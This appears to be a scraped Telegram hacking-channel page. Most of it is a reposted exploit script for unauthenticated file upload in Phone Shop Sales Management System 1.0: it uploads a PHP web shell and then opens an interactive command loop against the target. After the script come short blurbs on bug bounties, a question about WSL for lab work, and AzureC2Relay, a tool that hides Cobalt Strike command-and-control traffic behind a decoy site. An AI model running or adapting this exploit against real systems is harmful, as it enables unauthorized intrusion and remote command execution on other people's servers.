Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66.1K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Phone Shop Sales Management System 1.0 Shell Upload

https://3.bp.blogspot.com/--aVxNCIn1VA/WWlvnVN-uzI/AAAAAAAAIRQ/ADDhvty6Qn8T3Zf1bX42ni77vOOnTgOQwCLcBGAs/s1600/hack_img5.png
Phone Shop Sales Management System version 1.0 suffers from a remote shell upload vulnerability.

MD5 | 10fbcabc593444ffc45f13cf9713a185

Download
# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

import requests
import sys

IP="127.0.0.1" # CHANGE ME

ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()

def postShell():

data = {
"ProductName":"1",
"BrandName":"1",
"ProductPrice":1,
"Quantity":"1",
"TotalPrice":1,
"DisplaySize":"1",
"OperatingSystem":"1",
"Processor":"1",
"InternalMemory":"1",
"RAM":"1",
"CameraDescription":"1",
"BatteryLife":"1",
"Weight":"1",
"Model":"1",
"Dimension":"1",
"date2":"1",
"Description":"1",
"_wysihtml5_mode":"1",
}
fileData = {
'ProductImage':("rev.php","<?php", "application/octet-stream")}

r = s.post(ADDURL, files=fileData, data=data)

if "The product is successfully added" in r.text:
return True
else:
return False

def runWebShell():
try:
while True:
cmd=input("\033[32;1m" +"$: "+ "\033[0m")
if cmd == "exit":
sys.exit()
r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
if r.status_code == 200:
print(r.text)
else:
raise Exception("Cmd error")
except KeyboardInterrupt():
sys.exit()

def banner():
ban = r"""__________.__ _________.__ _________ .__ _____ _________
\______ \ |__ ____ ____ ____ / _____/| |__ ____ ______ / _____/____ | | ____ ______ / \ / _____/
| ___/ | \ / _ \ / \_/ __ \ \_____ \ | | \ / _ \\____ \ \_____ \\__ \ | | _/ __ \ / ___/ / \ / \ \_____ \
| | | Y ( <_) | \ ___/ / \| Y ( <_) |_> > / \/ __ \| |_\ ___/ \___ \ / Y \ / \
|____| |___| /\____/|___| /\___ > /_______ /|___| /\____/| __/ /_______ (____ /____/\___ >____ > \____|__ / /\ /_______ / /\
\/ \/ \/ \/ \/ |__| \/ \/ \/ \/ \/ \/ \/ \/ """

return ban

def main():
print("\033[34;1m" + banner() + "\033[0m")
print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n")
print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m")
if postShell():
print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m")
runWebShell()

if __name__ == "__main__":
main()

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Beware the Bug Bounty

In recent months, bug-bounty programs have shifted from mitigating risk to inadvertently creating new liabilities for customers and vendors.
hacking: security in practice
Is Wls2 recommended for hacking?

Title says it all , I know VM is usually the way but for labs like HTB does it matter if is a VM or just wls?

submitted by /u/ChinadaCam
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
AzureC2Relay : An Azure Function That Validates And Relays Cobalt Strike Beacon

AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. Any incoming requests that do not share the profiles user-agent, URI paths, headers, and query parameters, will be redirected to a configurable decoy website. The validated C2 traffic is […]

The post AzureC2Relay : An Azure Function That Validates And Relays Cobalt Strike Beacon appeared first on Kali Linux Tutorials.